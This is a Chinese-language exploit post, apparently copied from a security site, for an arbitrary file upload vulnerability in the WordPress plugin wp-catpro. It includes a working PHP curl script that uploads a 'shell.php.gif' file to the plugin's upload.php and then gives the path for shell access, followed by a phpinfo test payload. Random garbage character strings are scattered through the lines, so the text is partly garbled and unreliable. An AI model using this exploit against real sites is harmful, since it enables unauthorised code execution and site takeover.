WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
/ ?. {3 ~' w; w6 f$ h1 \0 u#-----------------------------------------------------------------------
, s6 R5 I9 |1 K5 e" Z
作者  => Zikou-16
邮箱 => zikou16x@gmail.com
/ f$ N; P$ H0 p( w7 J, O测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
  u* }+ X# F2 Z
+ o/ r6 x3 [& \% S+ w" V1 H8 R& |#=> Exploit 信息:
& {+ X5 l& C0 v( x, d& p' D. K0 r------------------
# 攻击者可以上传 file/shell.php.gif
: q- L0 g% [  J5 ~7 T8 j* T# ("jpg", "gif", "png")  // Allowed file extensions
- |. E. ?! N, `# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
& X4 v3 ~- x  ?3 a' w+ F6 \# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
& n$ [  K* h& v& k6 M& B------------------
. H$ g' n. Z/ T. u1 C% K
0 G- m* G( R$ e  h: R& ?/ ?- O#=> Exploit
+ h0 |# L0 j4 k( q" F  r! O-----------
# \5 m' O, r; g& P5 r<?php
0 j) q8 `9 u- Q! t; @# X
$uploadfile="zik.php.gif";
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
1 g6 j8 _; P- u  q4 z6 P2 F$ Ncurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
; A) W: Z7 T/ [/ B4 l6 Rarray('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
2 ]$ a. M  r/ G/ q$postResult = curl_exec($ch);
curl_close($ch);
( S+ |6 m3 t2 a4 l
; y" y' d' o  l8 Qprint "$postResult";
  r9 a3 j( t/ I3 e9 n0 T
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
2 I% p% d( z0 w" r; S- V<?php
phpinfo();
$ E" i8 i& d! z7 Y, P?>